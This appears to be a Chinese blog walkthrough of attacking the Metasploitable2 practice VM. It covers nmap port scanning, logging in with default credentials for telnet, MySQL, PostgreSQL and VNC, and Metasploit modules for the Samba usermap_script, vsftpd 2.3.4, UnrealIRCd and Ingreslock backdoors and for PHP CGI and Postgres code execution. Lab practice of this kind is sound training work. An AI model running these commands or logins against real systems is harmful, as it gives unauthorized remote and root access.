Metasploitable2 靶机详细漏洞介绍及通关

测试前准备

使用ifconfig命令,在虚拟机获取Metasploitable2的IP地址

 在kali 使用ping命令,ping 10.0.0.112 尝试连接靶机。

Nmap - 端口扫描神器

简单介绍:

Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。

作用

  1. 探测网路上存活的主机
  2. 探测主机开放的端口
  3. 探测相应端口的服务或软件和版本
  4. 探测操作系统,硬件地址,和软件版本
  5. 探测脆弱性漏洞(用自带的或者自己编译的脚本检测漏洞)

在进行漏洞测试前扫描靶机端口:使用nmap工具,命令为nmap -p 0-65535 10.0.0.112

注:-p为端口扫描命令,0-65535为计算机端口号(计算机总共有65536个端口),10.0.0.112为IP地址。

 注:rhosts为远程端口,lhost为本地端口

1.弱命令漏洞

系统弱密码

telnet 10.0.0.112 账号密码都为msfadmin

 

Mysql弱密码

使用mysql -h 10.0.0.112-u root 直接登录成功

 

PostgresQL弱密码

使用psql -h 10.0.0.112 -U postgres
密码:postgres 登录成功

 

VNC远程登录弱密码

使用vnciewer 10.0.0.112

密码password直接登录

 

2.Samba MS-RPC Shell命令注入漏洞

漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

(1)在kali中启用msfconsole

 (2)搜索相对应的samba漏洞代码 search samba

 

(3)使用exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

(4)设置参数set rhosts 10.0.0.112

(5)执行命令,查看目录

run  
ls

 

3、Vsftpd源码包含后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码

(1)在kali中启用msfconsole

 (2)搜索关于Vsftpd相关的漏洞库

search vsftpd

 

(3)使用exploit/unix/ftp/vsftpd_234_backdoor

use exploit/unix/ftp/vsftpd_234_backdoor

 

(4)设置参数set rhosts10.0.0.112

4.UnreallRCd后门漏洞

漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码

(1)找到相对应的模块进行使用

 (2)设置相对应的参数并执行

 

 

5.PHP CGI 参数注入执行漏洞

漏洞介绍:GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

(1)找到相对应的模块进行使用

 (2)设置相对应的参数

 (3)执行

 

6、Ingreslock后门漏洞

漏洞介绍:Ingreslock 后门程序监听在1524端口,连接到1524端口就可以直接获得root权限

(1)执行telnet命令,直接获取权限

 

7、Postgres共享库代码任意执行

漏洞介绍:在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码

(1)找到相对应的模块进行使用

 

(2)验证漏洞(可省略)

show options //显示信息

 (3)设置参数并执行

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值